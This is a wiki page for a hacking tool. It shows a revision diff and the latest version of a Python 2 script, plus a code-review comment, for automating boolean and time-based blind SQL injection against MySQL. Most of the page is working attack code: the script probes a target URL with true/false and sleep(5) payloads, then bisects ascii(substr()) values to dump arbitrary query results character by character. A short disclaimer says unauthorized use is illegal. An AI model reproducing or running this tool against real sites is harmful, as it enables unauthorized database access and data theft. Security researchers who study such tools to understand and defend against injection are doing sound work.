
Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

(Source)
 
(12 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{info|<center>This script uses time and boolian based blind [[SQL injection]] to obtain the desired information from MySQL database.</center>}}
+
{{info|<center>This [[python]] script uses time and [[boolean enumeration|boolean]] based blind [[SQL injection]] to obtain the desired information from [[MySQL]] [[database]]s.</center>}}
 +
 
 +
<font size="-2">Special thanks to [[User:Dilon|Dilon]] for this tool.</font>
  
 
=Info=
 
=Info=
 +
{{main|mysqli-blindutils}}
 
The syntax of this script is:
 
The syntax of this script is:
   python bsqli.py -u [url] -i [injection]
+
   python sqli-slee.py -u [url] -i [injection]
 
==Example==
 
==Example==
   python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"
+
   python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"
  
 
==Disclaimer==
 
==Disclaimer==
Line 12: Line 15:
 
=Source=
 
=Source=
 
{{code|text= <source lang="python">
 
{{code|text= <source lang="python">
#!/usr/bin/python
+
#!/usr/bin/python2.7
 
+
import sys,re,urllib,urllib2,string,time
+
import sys,re,urllib2,string,time
 
from optparse import OptionParser
 
from optparse import OptionParser
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
+
 
def request(URL):
 
def request(URL):
useragent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
+
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, useragent)
+
    req = urllib2.Request(URL, None, user_agent)
try:
+
  request=urllib2.urlopen(req)
+
except HTTPError,  e:
+
  print('[!] The server couldnt fulfill the request.')
+
  print('[!] Error code: '+str(e.code))
+
  sys.exit(1)
+
except URLError,  e:
+
  print('[!] We failed to reach a server.')
+
  print('[!] Reason: '+str(e.reason))
+
  sys.exit(1)
+
return len(request.read())
+
  
 +
    try:
 +
        request = urllib2.urlopen(req)
 +
 +
    except HTTPError, e:
 +
        print('[!] The server couldnt fulfill the request.')
 +
        print('[!] Error code: ' + str(e.code))
 +
        sys.exit(1)
 +
 +
    except URLError, e:
 +
        print('[!] We failed to reach a server.')
 +
        print('[!] Reason: ' + str(e.reason))
 +
        sys.exit(1)
 +
 +
    return len(request.read())
 +
 
def value(URL):
 
def value(URL):
target=0
+
    target = 0
end=0
+
    end = 0
nextmaybe=0
+
    next_maybe = 0
floor=0
+
    floor = 0
ceiling=255
+
    ceiling = 255
maybe = int(ceiling)/2
+
    maybe = int(ceiling)/2
while(1):
+
 
end+=1
+
    while(end != 9):
if(end==9):
+
        if(is_what(URL, maybe, '>')):
return 'done'
+
            floor = maybe
  if iswhat(URL, maybe, '>'):
+
            next_maybe = int(maybe + ((ceiling - floor)/2))
    floor = maybe
+
 
    nextmaybe = int(maybe + ((ceiling - floor)/2))
+
        elif(is_what(URL, maybe, '<')):
  elif iswhat(URL, maybe, '<'):
+
            ceiling = maybe
    ceiling = maybe
+
            next_maybe = int(maybe - ((ceiling - floor)/2))
    nextmaybe = int(maybe - ((ceiling - floor)/2))
+
 
  elif iswhat(URL, maybe, '='):
+
        elif(is_what(URL, maybe, '=')):
    return chr(maybe)
+
            return chr(maybe)
  maybe = nextmaybe
+
 
 +
        maybe = next_maybe
 +
        end += 1
 +
 
 +
    return 'done'
 +
 +
def is_what(URL, maybe, op):
 +
    if(sqli_type == 'boolean'):
 +
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
 +
        if(TrueResponse == ValueResponse):
 +
            return 1
 +
        else:
 +
            return 0
 +
    elif(sqli_type == 'time'):
 +
        start = time.time()
 +
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
 +
        elapsed_time = (time.time() - start)
 +
        if (elapsed_time > 2):
 +
            return 1
 +
        else:
 +
            return 0
 +
 +
def vuln_check(URL):
 +
    print('[+] Checking site...')
  
def iswhat(URL,maybe,op):
+
    global TrueResponse
if(sqlitype=='boolian'):
+
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  ValueResponse=int(request(str(URL)+str(op)+str(maybe)+'--+'))
+
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
  if(TrueResponse==ValueResponse):
+
    return 1
+
  else:
+
    return 0
+
elif(sqlitype=='time'):
+
start = time.time()
+
  ValueResonse=request(str(URL)+str(op)+str(maybe)+')*2)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 2):
+
    return 1
+
  else:
+
    return 0
+
  
def vulncheck(URL):
+
    if(TrueResponse != FalseResponse):
print('[+] Checking site...')
+
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
global TrueResponse
+
        return 'boolean'
TrueResponse=int(request(URL+'%20AND%2043%20like%2043--+'))
+
    else:
FalseResponse=int(request(URL+'%20AND%2034%20like%2043--+'))
+
        start = time.time()
if(TrueResponse!=FalseResponse):
+
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
  print('[+] Site seems to be vulnerable to boolian based blind SQL injection.')
+
        elapsed_time = (time.time() - start)
  return 'boolian'
+
else:
+
  start = time.time()
+
  SleepResponse=request(URL+'%20and%20sleep(5)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 5):
+
    print('[+] Site seems to be vulnerable to time based blind SQL injection.')
+
    return 'time'
+
  else:
+
    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
+
    sys.exit(1)
+
  
 +
        if(elapsed_time > 5):
 +
            print('[+] Site seems to be vulnerable to time based blind SQL injection.')
 +
            return 'time'
 +
        else:
 +
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
 +
            sys.exit(1)
 +
 
def main():
 
def main():
print('''
+
    print('''
Auto BSQLi tool for MySQL
+
                Auto BSQLi tool for MySQL
      ''')
+
                ''')
 +
 +
    usage = 'usage: %prog -u <target> -i <injection>'
 +
    parser = OptionParser(usage=usage)
 +
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
 +
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 +
 +
    (options, args) = parser.parse_args()
 +
    if(options.URL and options.INJECTION):
 +
        URL = options.URL
 +
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
 +
    else:
 +
        print('[!] Missing url or injection parameter.')
 +
        print('[!] Use --help.')
 +
        sys.exit(1)
 +
 +
    global sqli_type
 +
    sqli_type = vuln_check(URL)
 +
    position = 1
 +
    dump = ''
 +
    print('[+] Dumping data...')
  
usage = 'usage: %prog -u <target> -i <injection>'
+
    while(1):
parser = OptionParser(usage=usage)
+
        if(sqli_type == 'boolean'):
parser.add_option("-u", action="store", type="string", dest="URL",
+
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"http://site.tld/index.php?id=1%27"')
+
        elif(sqli_type == 'time'):
parser.add_option('-i', action='store', type='string', dest='INJECTION',
+
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"select version()"')
+
  
(options, args) = parser.parse_args()
+
        if(letter == 'done'):
if options.URL and options.INJECTION:
+
            break
  URL=options.URL
+
  INJECTION=urllib2.quote(options.INJECTION.encode("utf8"))
+
else:
+
  print('[!] Missing url or injection parameter.')
+
  print('[!] Use --help.')
+
  sys.exit(1)
+
  
global sqlitype
+
        dump = dump + letter
sqlitype=vulncheck(URL)
+
        position += 1
position=1
+
dump=''
+
print('[+] Dumping data...')
+
while(1):
+
if(sqlitype=='boolian'):
+
letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
  elif(sqlitype=='time'):
+
    letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
if(letter=='done'):
+
break
+
    dump=dump+letter
+
  position+=1
+
if(dump):
+
print('[+] Data: '+dump)
+
else:
+
print('[!] No data dumped. Check your injection.')
+
  
 +
    if(dump):
 +
        print('[+] Data: ' + dump)
 +
    else:
 +
        print('[!] No data dumped. Check your injection.')
 +
 
if __name__ == "__main__":
 
if __name__ == "__main__":
 
     main()
 
     main()
 
</source>}}
 
</source>}}
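Review bot: The new `is_what` binds the time-based request to `ValueResonse`, a misspelled name that is never read; the same commit leaves `target` in `value`, `SleepResponse` in `vuln_check` and `args` in `main` assigned but unused. Since only the elapsed time matters in that branch, the call can stand on its own: `request(str(URL) + str(op) + str(maybe) + ')*2)--+')`, and the other three bindings can be dropped. Separately, `request()` terminates the process with `sys.exit(1)` from inside a helper, so neither `value` nor `vuln_check` can distinguish a network failure from a probe result; a comment on `request` saying that any HTTPError/URLError aborts the whole run would at least make that contract visible. The `except HTTPError, e:` form and the `python2.7` shebang pin the file to Python 2, which is worth stating in a module docstring since the `int(ceiling)/2` arithmetic in `value` depends on Python 2 integer division.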

Latest revision as of 02:57, 21 November 2012

This python script uses time-based and boolean-based blind SQL injection to obtain the desired information from MySQL databases.

Special thanks to Dilon for this tool.

Info

Main article: mysqli-blindutils

The syntax of this script is:

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
    """Fetch *URL* once and return the length of the response body.

    Only the body size is returned: the boolean-based probes in
    vuln_check() and is_what() compare response lengths, not content.
    Any HTTPError or URLError is reported on stdout and then terminates
    the whole program with sys.exit(1); nothing propagates to the caller.
    """
    # Static desktop-browser User-Agent attached to every probe request.
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
 
    try:
        # NOTE: the local name `request` shadows this function inside its own body.
        request = urllib2.urlopen(req)
 
    except HTTPError, e:  # Python 2 except syntax (shebang pins python2.7)
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
 
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
 
    # The full body is read just to measure it; the content is discarded.
    return len(request.read())
 
def value(URL):
    """Bisect one byte value (0-255) using is_what() as the oracle.

    *URL* already ends in an `ascii(substr(...))` expression (built in
    main()); is_what() appends the comparison operator and the candidate
    number.  Returns chr(candidate) as soon as the '=' probe matches, or
    the string 'done' once nine probes have passed without a match --
    main() treats 'done' as the end of the data.
    """
    target = 0  # assigned but never read
    end = 0  # probe counter; the loop stops after nine rounds
    next_maybe = 0
    floor = 0
    ceiling = 255
    # Under Python 2 (see shebang) `/` on ints is floor division, so
    # `maybe` stays an int and chr(maybe) below is valid.
    maybe = int(ceiling)/2
 
    while(end != 9):
        if(is_what(URL, maybe, '>')):	
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '<')):
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '=')):
            return chr(maybe)
 
        # Each round costs up to three requests ('>', '<', '=').
        maybe = next_maybe
        end += 1
 
    return 'done'
 
def is_what(URL, maybe, op):
    """Return 1 if `<URL><op><maybe>` evaluates true on the server, else 0.

    Reads two module globals: `sqli_type` (set in main() from
    vuln_check()) selects the oracle, and `TrueResponse` (set in
    vuln_check()) is the body length of a known-true condition.  If
    `sqli_type` is neither 'boolean' nor 'time' the function falls off
    the end and returns None.
    """
    if(sqli_type == 'boolean'):
        # Boolean oracle: a response the same length as the known-true
        # baseline is taken as "condition true".
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
        if(TrueResponse == ValueResponse):
            return 1
        else:
            return 0
    elif(sqli_type == 'time'):
        # Time oracle: the suffix closes the sleep(...) opened in main();
        # a round trip longer than 2 s is taken as "condition true".
        # `ValueResonse` (sic) is never read; only the elapsed time matters.
        # The 2 s threshold here differs from the 5 s one in vuln_check().
        start = time.time()
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        elapsed_time = (time.time() - start)
        if (elapsed_time > 2):
            return 1
        else:
            return 0
 
def vuln_check(URL):
    """Decide which blind oracle the target exposes and return its name.

    Sends one known-true and one known-false condition and compares the
    body lengths; a difference selects 'boolean'.  Otherwise a sleep(5)
    probe is timed and a round trip over 5 s selects 'time'.  If neither
    applies the program exits with status 1.  Side effect: sets the
    module global `TrueResponse`, which is_what() later compares against.
    """
    print('[+] Checking site...')
 
    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
    if(TrueResponse != FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        # `SleepResponse` is assigned but never read; only the timing is used.
        start = time.time()
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
        elapsed_time = (time.time() - start)
 
        if(elapsed_time > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)
 
def main():
    """Parse -u/-i, detect the oracle type and extract the query result one byte at a time.

    Both options are required; the injection text is percent-encoded
    before being spliced into the URL.  Sets the module global
    `sqli_type` for is_what().  The loop ends when value() returns
    'done'; there is no other upper bound on the number of positions.
    """
    print('''
                Auto BSQLi tool for MySQL
                ''')
 
    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
    (options, args) = parser.parse_args()  # `args` is not used
    if(options.URL and options.INJECTION):
        URL = options.URL
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)
 
    global sqli_type
    sqli_type = vuln_check(URL)
    position = 1  # 1-based substr() offset of the byte being recovered
    dump = ''
    print('[+] Dumping data...')
 
    while(1):
        # value()/is_what() append the comparison operator and candidate;
        # the 'time' form leaves sleep( open, which is_what() closes.
        if(sqli_type == 'boolean'):
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        elif(sqli_type == 'time'):
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
        if(letter == 'done'):
            break
 
        dump = dump + letter
        position += 1
 
    if(dump):
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
# Script entry point: main() handles option parsing and exits on error.
if __name__ == "__main__":
    main()